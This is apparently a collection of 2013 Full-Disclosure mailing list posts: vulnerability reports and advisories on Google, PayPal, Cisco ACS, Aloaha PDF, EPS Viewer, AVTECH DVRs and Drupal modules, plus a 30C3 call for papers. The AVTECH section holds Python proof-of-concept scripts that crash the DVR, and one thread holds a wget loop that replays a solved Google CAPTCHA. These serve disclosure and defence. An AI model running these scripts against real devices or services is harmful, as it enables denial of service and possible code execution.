[Full-disclosure] Google Docs Clickjacking / Information Disclosure
I reported this problem to Google in June but I did not get the usual reply saying they were working on it, so I guess it isn't serious enough to be fixed. The problem is the page for requesting access to a private document. It does not have any protection against being framed, so you can make a private document, trick someone into clicking the button to request access and get an email from Google Docs with their full name and email address. PoC: http://buildism.net/files/GoogleDocsClickjacking2.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PayPal's "invalid" aksession Padding Oracle Flaw
The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery. Here's an example of an aksession cookie: 1371856787~id=cookieMOF13DX8hKxMUVKWTDJ4Mp6lam2TdbUs44BJ7iduOubp9+zII2ZAWPz9C9HM3GQDGNhUPxyHZ9eHF9kkF6BYdLaRYxMIpGlMYgobM+FYnB8//iMqth8sT/wrigUy4jnV1OLnkkE2g4x= The ciphertext begins immediately after the "cookie" string. The base64 value's first 8 bytes is the random initialization vector. The decrypted plaintext contains: expiretime=1371856787&sessionip=61.183.192.0&strategy=0&scriptid=&challenge=0&seedid=PRI This flaw currently still exists in the PayPal site. PayPal was notified through their bug bounty program, but they determined that this flaw is "invalid" and does not deserve a bounty. They said it would be fine to publish it. To be fair, this cookie does indeed contain no sensitive information. However, I think it may be a bit short-sighted of PayPal to discount this issue, since there are several potentially interesting parameters in the plaintext that could be forged by an attacker. I have only ever observed plaintext values like the one above (that is, with several parameters blank or "0"), so I can't tell for sure what they are used for. PayPal never confirmed for me whether or not they investigated attack scenarios involving modification of the parameters. (In general, their responses were incredibly terse and unhelpful.) I've decided it isn't worth more of my time trying to fuzz these parameters, but perhaps someone else will get lucky. I figured I could at least use this issue as an educational opportunity-- I've created a short video which demonstrates how to identify and exploit this problem using the Bletchley[1] took kit: http://youtu.be/qqNgcc9v_DQ If you are interested in learning more, note that I'll be giving a 2-day training course[2] at AppSecUSA 2013 which will cover exploitation of a wide variety of common cryptography implementation problems, including padding oracle flaws. Finally, for those keeping score, here's a disclosure timeline: 2013-06-22 Initial notification with vulnerability details 2013-06-24 Form-letter response from PayPal 2013-06-28 Sent follow up with exploit script. 2013-07-12 Asked for an update from PayPal. PayPal responded that the evaluation is still "in process". 2013-07-15 PayPal indicated that the bug is not eligible for a bounty because: "This cookie doesnt contain any sensitive information." 2013-07-15 Responded to PayPal urging them to investigate the possibility of malicious modification of parameters within the cookie, since doing this exhaustively in a black box way requires a great deal of effort. 2013-08-06 After being ignored in the prior email, asked PayPal if it would be ok to publish this flaw. 2013-08-07 PayPal responded with: "This bug does not contain any sensitive data and we have determined it is invalid. You may publish your findings regarding this bug." Enjoy, tim @ecbftw 1. https://code.google.com/p/bletchley/ 2. http://sched.co/19n00R5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability Advisory ID: cisco-sa-20130828-acs Revision 1.0 For Public Release 2013 August 28 16:00 UTC (GMT) +-- Summary === A vulnerability in the EAP-FAST authentication module of Cisco Secure Access Control Server (ACS) versions 4.0 through 4.2.1.15 could allow an unauthenticated, remote attacker to execute arbitrary commands on the Cisco Secure ACS server. This vulnerability is only present when Cisco Secure ACS is configured as a RADIUS server. The vulnerability is due to improper parsing of user identities used for EAP-FAST authentication. An attacker could exploit this vulnerability by sending crafted EAP-FAST packets to an affected device. An exploit could allow the attacker to execute arbitrary commands on the Cisco Secure ACS server and take full control of the affected server. There are no workarounds for this vulnerability. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130828-acs -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.20 (Darwin) iF4EAREKAAYFAlId9U8ACgkQUddfH3/BbTq1hgD9E1+zaqDXuMB+3vutKxeVWOm1 SZu8LlzZCoI7y+J9fnYA/2PiBWLsMJULUwdntZGqimWru7mXOe8OSQhaYJSglW3r =6OJl -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CAPTCHA re-riding attack in https://google.com
I don't see a captcha bypass, all I see is a wget command with Cookie and Session ID and such. while true; do echo "Yes, I am blind!"; done Am 2013-08-26 18:04, schrieb kevin philips: > Hi Adam, > As discussed, this issue just a captcha bypass problem. Except this case, I > don't know google still uses this captcha somewhere or not :). Anyway, thank > you Adam! Your reply is a very clear way to explain it. > See more: > https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008) [1] > > Cheers, > ~g4mm4 > > On Mon, Aug 26, 2013 at 10:34 PM, adam wrote: > > What exactly is a re-riding attack? Is that just another name for replay? And > does this only work in the sorry/continue context for google.com [2]? If so, > I don't think it's really that big of a deal either. Repeated requests, > typically, are the cause of the sorry/continue page, so I can't see how > _more_ repeated requests will somehow solve that. To be clear: sure, I get > that for the time being - you're able to circumvent the captcha - if I'm > understanding correctly. However, in this case, that captcha is only a > courtesy anyway. It's the middle ground between normal user and infected > machine/bot, where they give you a little extra leniency before totally > banning you anyway. If I'm misunderstanding, or if it applies on a wider > scale than that, please let me know. > > On Mon, Aug 26, 2013 at 12:07 AM, kevin philips wrote: > > folks, > I found CAPTCHA re-riding attack issue in https://google.com [3]. > PoC: > Loop request with correct captcha (in this case the value of captcha is > coppro): > > while true; do wget --header="Cookie: > PREF=ID=44ba1c9fba493ea4:U=e326f1400e3cc5b1:LD=vi:TM=1343010889:LM=1361717433:S=2dw8AygnrF9_TW_I; > > NID=67=mwocoU0FoMG_dewxiEO3zDc7LLQtKVabiaezQsipcVb-020jysQ9qfngMTyIYNGsub8G7eQBqQPuTXUAO3GJVFZZWjF4tawOwj0KGaRTbw27z0ZEuZtSN-98hX1KedvpY_rzoHyd-InVhDtoG9dqONDS88RmP8JxgZAz7GhtH_QWpTk1WUIY4WTMb6AQ5f58oYUlgQ; > > SID=DQAAAMEeueuQrtMIKY0NaJovAs1RyF3U1GgJWaoy5UBsCcZV3i2BF5jflSj7nG8YhPQoAe5kwE0eBjJzqeEafDuSTuTaTAGECW0rv2Fw1SQ8NHRzf9m4ymwerpALiHDeHUUlOlWmbrhXzjVm_RMkfvqohuwmHHAHPJKi-8MyKQbjiQd5lGEIH0JArQ8lUEuuqRRVUjBsTXis1TPqQWwHcHY5Chtm2ZOhZxoy2Xj59q8s_eC-Gj5YJ70jisfQrIWjhbjWeB3HvFVXinAWUVdvA6_5VbJ1; > HSID=ACvpz7M2xPdk68Q6x; APISID=C9DV1u24Umr1AfnD/AfEqGieNRVPzU6fur; > GDSESS=ID=cba44dffe2e20f09:TM=1374658124:C=c:IP=123.30.135.76-:S=APGng0snWLymjFQpx5DRXTM0yyoZnM5h5w" "http://www.google.com.vn/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com.vn%2Fsearch%3Fq%3Dcaptcha%2Bre%2Briding%2Battack%26client%3Dubuntu%26channel%3Dcs%26oq%3Dcaptcha%2Bre%2Briding%2Battack%26aqs%3Dchrome.0.69i57j69i65.6126j0%26sourceid%3Dchrome%26ie%3DUTF-8&id=17901488348886592341&captcha=coppro&submit=G%E1%BB%ADi [4]" -qd; done > > Abuse this bug, malware, automation scanner, zombie computers, SEO bot can > bypass the google captcha with the correct initiation captcha for malicious > actions. > > References: > _https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/ [5] > _http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html [6] > > Updated: Sadly, Google Security Team considers "captcha re-riding attack" in > this case is not critical bug. Well, I decide to post to Full Disclosure for > more discussions. > > ~g4mm4 > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html [7] > Hosted and sponsored by Secunia - http://secunia.com/ [8] -- --g4mm4 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html [7] Hosted and sponsored by Secunia - http://secunia.com/ [8] Links: -- [1] https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008) [2] http://google.com [3] https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&URL=https%3a%2f%2fgoogle.com [4] https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&URL=http%3a%2f%2fwww.google.com.vn%2fsorry%2fCaptcha%3fcontinue%3dhttp%253A%252F%252Fwww.google.com.vn%252Fsearch%253Fq%253Dcaptcha%252Bre%252Briding%252Battack%2526client%253Dubuntu%2526channel%253Dcs%2526oq%253Dcaptcha%252Bre%252Briding%252Battack%2526aqs%253Dchrome.0.69i57j69i65.6126j0%2526sourceid%253Dchrome%2526ie%253DUTF-8%26id%3d17901488348886592341%26captcha%3dcoppro%26submit%3dG%25E1%25BB%25ADi [5] https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/ [6] http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html [7] http://lists.grok.org.uk/full-disclosure-charter.html [8] http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia
[Full-disclosure] rhev-hypervisor6 package security update
Redhat has released a security update for rhev-hypervisor6 package. Check this url: http://rhn.redhat.com/errata/RHSA-2013-1181.html Thanks Alrashid http://www.itsecuritycenter.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2013-0805] Aloaha PDF Suite Buffer Overflow Vulnerability
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Aloaha PDF Suite Buffer Overflow Vulnerability
1. *Advisory Information*
Title: Aloaha PDF Suite Buffer Overflow Vulnerability
Advisory ID: CORE-2013-0805
Advisory URL:
http://www.coresecurity.com/advisories/aloaha-pdf-suite-buffer-overflow-vulnerability
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: Aloaha Software
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4978
3. *Vulnerability Description*
Aloaha PDF Suite [1], [2] is prone to a security vulnerability when
processing PDF files. This vulnerability could be exploited by a remote
attacker to execute arbitrary code on the target machine by enticing
Aloaha users to open a specially crafted PDF file.
4. *Vulnerable Packages*
. AloahaPDFViewer v5.0.0.7.
. Older versions are probably affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
There was no official answer from Aloaha after several attempts to
report this vulnerability (see [Sec. 8]). As mitigation action, given
that this is a client-side vulnerability, avoid to open untrusted PDF
files. Contact vendor for further information.
6. *Credits*
This vulnerability was discovered and researched by Marcos Accossatto
from CORE Exploit Writers Team.
7. *Technical Description / Proof of Concept Code*
Below is shown the result of opening the maliciously crafted PDF file [3]:
/-
$+B6BB8 >|> 8B07 |MOV EAX,DWORD PTR DS:[EDI]
$+B6BBA >|. C740 14 1E00 |MOV DWORD PTR DS:[EAX+14],1E; <
Exception - Tries to write to 909090A4
$+B6BC1 >|. 8B5424 04 |MOV EDX,DWORD PTR SS:[ESP+4]
$+B6BC5 >|. 8950 18 |MOV DWORD PTR DS:[EAX+18],EDX
$+B6BC8 >|. 8BC7 |MOV EAX,EDI
$+B6BCA >|. 8B10 |MOV EDX,DWORD PTR DS:[EAX]
-/
At that time, the registers 'EDX', 'EBX', 'EBP' and 'EDI' points to the
shellcode; the 'EAX' register contains the first 'DWORD' of our shellcode:
/-
EAX 90909090
ECX 07B4
EDX 0012DD44 ASCII "DD..."
EBX 051ACFF1 ASCII "DD..."
ESP 0012D9EC
EBP 0012DC54 ASCII "DD..."
ESI 02F0
EDI 0012DB78
EIP 03727BBA
C 0 ES 0023 32bit 0()
P 1 CS 001B 32bit 0()
A 0 SS 0023 32bit 0()
Z 0 DS 0023 32bit 0()
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS NULL
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (0008)
EFL 0206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 16312.144994243513790
ST1 empty 3869.8214873218676080
ST2 empty -0.0
ST3 empty -0.0
ST4 empty 1.000
ST5 empty 4.398046511104000e+12
ST6 empty 5.307858023350276e+15
ST7 empty 5.0609752291423027300e+17
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 037F Prec NEAR,64 Mask1 1 1 1 1 1
-/
The stack's exception handler is overwritten with:
/-
0012D9EC F94D
0012D9F0 000A
0012DB5C 0EDDE2F1
0012DB60 909006EB Pointer to next SEH record
0012DB64 1106D8A0 SE handler
-/
In the address '1106D8A0' of 'AloahaTranslator.dll' we have:
/-
1106D8A0 . 83C4 14 ADD ESP,14
1106D8A3 . C3RETN
-/
and the stack:
/-
$ ==>> 7C9032A8 RETURN to ntdll.7C9032A8
$+4 > 0012D704
$+8 > 0012DB60
$+C > 0012D720
$+10 > 0012D6D8
$+14 > 0012DB60 Pointer to next SEH record
-/
So, the 'RETN' of '1106D8A3' will jump to '12DB60' (the stack) where our
shellcode is located:
/-
0012DB60 EB 06 JMP SHORT 0012DB68
0012DB62 90NOP
0012DB63 90NOP
0012DB64 A0 D8061190 MOV AL,BYTE PTR DS:[901106D8]
0012DB69 90NOP
-/
which means the normal execution flow can be altered in order to execute
arbitrary code.
8. *Report Timeline*
. 2013-08-06:
Core Security Technologies notifies the Aloaha team of the
vulnerability. Publication date is set for Aug 27th, 2013.
. 2013-08-06:
Vendor asks for a report with technical information.
. 2013-08-06:
Technical details and proof of concept sent to Aloaha team.
. 2013-08-12:
Core asks for a status update and notifies the advisory publication was
scheduled for Aug 27th. No reply received.
. 2013-08-20:
Core attempts to contact vendor.
. 2013-08-26:
Core attempts to contact vendor.
. 2013-08-27:
Release date missed.
. 2013-08-28:
After 3 attempts to contact vendor, the advisory CORE-2013-0805 is
published as 'user release'.
9. *References*
[1] http://www.aloaha.com.
[2] http://www.aloaha.com/wi-software-en/aloaha-pdf-suite-freeware.php.
[3]
http://www.coresecurity.com/system/files/attachments/2013/08/CORE-2013-0805-aloaha-poc-94238712635.zip.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with a
[Full-disclosure] CORE-2013-0808 - EPS Viewer Buffer Overflow Vulnerability
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ EPS Viewer Buffer Overflow Vulnerability 1. *Advisory Information* Title: EPS Viewer Buffer Overflow Vulnerability Advisory ID: CORE-2013-0808 Advisory URL: http://www.coresecurity.com/advisories/eps-viewer-buffer-overflow-vulnerability Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: EPS Viewer Team Release mode: User release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4979 3. *Vulnerability Description* EPS Viewer [1], [2] is prone to a security vulnerability when processing EPS files. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing EPS Viewer users to open a specially crafted EPS file (client-side vulnerability). 4. *Vulnerable Packages* . EPS viewer v3.2. . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from EPS team after several attempts to report this vulnerability (see [Sec. 8]). As mitigation action, given that this is a client-side vulnerability, avoid to open untrusted EPS files. Contact vendor for further information. 6. *Credits* This vulnerability was discovered and researched by Daniel Kazimirow from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Below is shown the result of opening the maliciously crafted EPS file [3], which means the normal execution flow can be altered in order to execute arbitrary code. /- 10089B0E . 8BFF MOV EDI,EDI 10089B10 > 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8] ; <--- crash (we control ESI) 10089B13 . 8B48 0C MOV ECX,DWORD PTR DS:[EAX+C] 10089B16 . 830E FE OR DWORD PTR DS:[ESI],FFFE 10089B19 . 85C9 TEST ECX,ECX 10089B1B . 8B7E 04 MOV EDI,DWORD PTR DS:[ESI+4] 10089B1E . 74 0C JE SHORT gsdll32.10089B2C 10089B20 . 50PUSH EAX 10089B21 . 57PUSH EDI 10089B22 . 8D56 10 LEA EDX,DWORD PTR DS:[ESI+10] 10089B25 . 52PUSH EDX 10089B26 . 53PUSH EBX 10089B27 . FFD1 CALL ECX ; jump to our code -/ The vulnerability exists in gldll32.dll module: /- Executable modules, item 1 Base=1000 Size=00A93000 (11087872.) Entry=102162B0 gsdll32. Name=gsdll32 Path=C:\Program Files\EPSViewer\gsdll32.dll EAX 035126E0 ASCII "TTTTUVWXYZXYUU ECX EDX 0028 EBX 0358A058 ESP 0012DA98 EBP 54545454 ESI 54544545 EDI 0038 EIP 10089B10 gsdll32.10089B10 C 1 ES 0023 32bit 0() P 0 CS 001B 32bit 0() A 0 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 1 FS 003B 32bit 7FFDE000(FFF) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS () EFL 0283 (NO,B,NE,BE,S,PO,L,LE) ST0 empty 0.0 ST1 empty 2.545318603515625 ST2 empty 2.1025514602661132810 ST3 empty 320326.00 ST4 empty -312.818359375 ST5 empty 0.0 ST6 empty 0.250 ST7 empty 250.9619140625000 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 -/ 8. *Report Timeline* . 2013-08-12: Core attempts to contact the EPS Viewer team, no reply received. Publication date is set for Aug 27th, 2013. . 2013-08-20: Core attempts to contact vendor. . 2013-08-26: Core attempts to contact vendor. . 2013-08-27: Release date missed. . 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0808 is published as 'user release'. 9. *References* [1] http://epsviewer.org/. [2] http://epsviewer.org/download.aspx. [3] http://www.coresecurity.com/system/files/attachments/2013/08/CORE-2013-0808-epsviewer-poc-8321106075.zip 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies*
[Full-disclosure] CORE-2013-0726 - AVTECH DVR multiple vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
AVTECH DVR multiple vulnerabilities
1. *Advisory Information*
Title: AVTECH DVR multiple vulnerabilities
Advisory ID: CORE-2013-0726
Advisory URL:
http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: AVTECH Corporation
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper
Access Control [CWE-284]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
3. *Vulnerability Description*
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and
potentially other devices sharing the affected firmware) that could
allow a remote attacker:
1. [CVE-2013-4980] To execute arbitrary code without authentication
by exploiting a buffer overflow in the RTSP packet handler.
2. [CVE-2013-4981] To execute arbitrary code without authentication
by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a
specially crafted HTTP POST request.
3. [CVE-2013-4982] To bypass the captcha of the administration login
console enabling several automated attack vectors.
4. *Vulnerable Packages*
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003.
. Older versions are probably affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
There was no official answer from AVTECH support team after several
attempts (see [Sec. 8]); contact vendor for further information. Some
mitigation actions may be:
. Do not expose the DVR to internet unless absolutely necessary.
. Have at least one proxy filtering the 'SETUP' parameter in RTSP
requests.
. Have at least one proxy filtering the 'Network.SMTP.Receivers'
parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
6. *Credits*
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core
Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were
discovered and researched by Facundo Pantaleo from Core Security
Consulting Team.
7. *Technical Description / Proof of Concept Code*
7.1. *Buffer Overflow in RTSP Packet Handler*
[CVE-2013-4980] The following Python script sends a specially crafted
packet that triggers a buffer overrun condition when handling the RTSP
transaction; no authentication is required. As a result, the device
crashes and it could possibly lead to a remote code execution.
/-
import socket
HOST = '192.168.1.1'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "SETUP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS
RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media
v2010.02.10)\r\n\r\n"
print "[*] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[*] Response:', repr(data), "\r\n"
s.close()
-/
7.2. *Buffer Overflow in config.cgi Parameters*
[CVE-2013-4981] The following Python script exploits other buffer
overflow condition; no authentication is required. As a result, the
device crashes and it would possible lead to a remote code execution.
/-
import httplib
ip = "192.168.1.1"
conn = httplib.HTTPConnection(ip)
conn.request("POST",
"/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=
HTTP/1.1")
resp = conn.getresponse()
print resp.read()
-/
7.3. *CAPTCHA Bypass*
[CVE-2013-4982] The following Python pro
[Full-disclosure] 30C3 Call for Participation
30C3 – 30th Chaos Communication Congress December 27th–30th 2013, CCH, Hamburg 30C3 is the 2013 edition of the Chaos Communication Congress, the Chaos Computer Club’s international conference and hacker party. During the four days between Christmas and New Year’s Eve, thousands of technology enthusiasts, tinkerers, artists, utopians and from Europe and all over the world come together at the Congress Center Hamburg (CCH) to exchange ideas, learn and party together. Participants engage with topics covering information technology, computer security, the make-and-break scene, critically constructive ways of dealing with technology and its effects on our societies. The lecture programme review and selection process will be put on a new basis this year. Submitted talk proposals will be selected by content teams in charge of one of the following tracks: - Art & Beauty - Ethics, Society & Politics - Crafting & Making - Security & Safety - Science & Engineering. Tracks == Art & Beauty Computers can be used to create art and beauty. This track is for all those lectures and installations dealing with creative approaches to culture, music and art. Crafting & Making - This track is about all those tools designed to turn the digital into the physical. We are looking forward to any submissions by those who, when they speak of cloud hacking, actually mean making it rain, who see e-bikes as a transport layer, and who happily forward viruses from their inbox to their DNA sequencer. Ethics, Society & Politics -- This track is about ethics, society and politics in the digital age. This includes submissions dealing with the dangers of technology in politics and society as well as the threats that politics pose for the digital society. At the same time, aside from fear and danger, we are interested in examples of happiness and hope for a better world through the interaction of technology and politics. Science & Engineering - This track is for all those who don’t think Knuth was a cute polar bear at the Berlin zoo. Submissions containing exoskeletons and “bleeding edge” research – anything cool that comes out of universities – as well as DIY experiments that aren’t about typical making belong in this track. You’ve solved the halting problem? Submit! Security & Safety - This track gathers people and groups who wish to describe or discuss technical computer related safety and security. We are interested in everything suitable to develop or bypass security mechanisms. This is not limited to software systems, this year the committee is especially interested in hardware topics. Technical weaknesses, tools, techniques and allied research all belong in this track. Assemblies -- Assemblies are places where communities of interest can meet in the core of the congress. They are comparable to villages at the various hacker camps. We will have lots of space again, so larger installations will be possible. The assemblies will be organized in the public Wiki. Self-understanding of the 30C3 == The CCC runs the congress with the help of self-organized volunteer teams and on its own funds. We are proud of this and we are looking forward to once again being able to put together a congress with no external influences and no need for self-censorship. We regard this event as one of the few places where a global exchange using the creative-critical approach to technology and society is possible without censorship. We are not providing a stage to secret services or other state organisations. However, based on our concept and on the fact that work is done on a voluntary basis, a thorough advance screening of participants and speakers is not possible. It goes without saying that everyone attending the conference should be treated with respect and consideration. A significant proportion of delegates and speakers value their privacy, the integrity of their own data and their photographic likenesses. Those who attach less importance to personal agency in these matters are in a stronger position. We therefore ask them to respect the feelings and wishes of others. Submission Guidelines = For talks and workshops --- Please send us a description of your suggested talk that is as complete as possible. The description is of particularly importance to the selection, so please ensure it is as clear as possible. Quality takes precedence over quantity. Due to the non-commerical nature of the Congress, presentations which aim to market or promote commerical products or entities will not be entertained. As it is likely that that there will be multiple submissions about the same topic, please show us exactly why your talk should be part of the conference. Please write something about yourself, your environment and your motivation. It does not matter if the talk has been held at a
[Full-disclosure] [Security-news] SA-CONTRIB-2013-072 - Node View Permissions - Access Bypass
View online: https://drupal.org/node/2076315 * Advisory ID: DRUPAL-SA-CONTRIB-2013-072 * Project: Node View Permissions [1] (third-party module) * Version: 7.x * Date: 2013-August-28 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Node View Permissions module adds permissions "View own content" and "View any content" for each content type on the permissions page. However, it only implements hook_node_access() and not hook_query_alter(), which means any listing of nodes does not respect the node view permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Node View Permissions 7.x-1.0. Drupal core is not affected. If you do not use the contributed Node View Permissions [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Node View Permissions module for Drupal 7.x, upgrade to Node View Permissions 7.x-1.2 [5] Also see the Node View Permissions [6] project page. REPORTED BY - * Mark Theunissen [7] FIXED BY * hoter [8] the module maintainer COORDINATED BY -- * Michael Hess [9] of the Drupal Security Team * Mark Ferree [10] provisional member of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/node_view_permissions [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/node_view_permissions [5] https://drupal.org/node/2031621 [6] http://drupal.org/project/node_view_permissions [7] https://drupal.org/user/108606 [8] http://drupal.org/user/1677790 [9] https://drupal.org/user/102818 [10] http://drupal.org/user/76245 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-071 - Flag - Cross Site Scripting
View online: https://drupal.org/node/2076221 * Advisory ID: DRUPAL-SA-CONTRIB-2013-071 * Project: Flag [1] (third-party module) * Version: 7.x * Date: 2013-August-28 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Flag module allows creation of customizable flags on entities. Flag does not properly sanitize the name of a flag on the main flag administration page, allowing a malicious user to embed scripts within a page, resulting in a Cross-site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker must have the 'Administer flags' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Flag 7.x-3.x versions prior to 7.x-3.0. Drupal core is not affected. If you do not use the contributed Flag [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Flag module for Drupal 7.x, upgrade to Flag 7.x-3.1 [5] Also see the Flag [6] project page. REPORTED BY - * Justin_KleinKeane [7] FIXED BY * Justin_KleinKeane [8] * Joachim Noreiko [9] the module co-maintainer COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/flag [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/flag [5] https://drupal.org/node/2075287 [6] http://drupal.org/project/flag [7] http://drupal.org/user/302225 [8] http://drupal.org/user/302225 [9] http://drupal.org/user/107701 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] 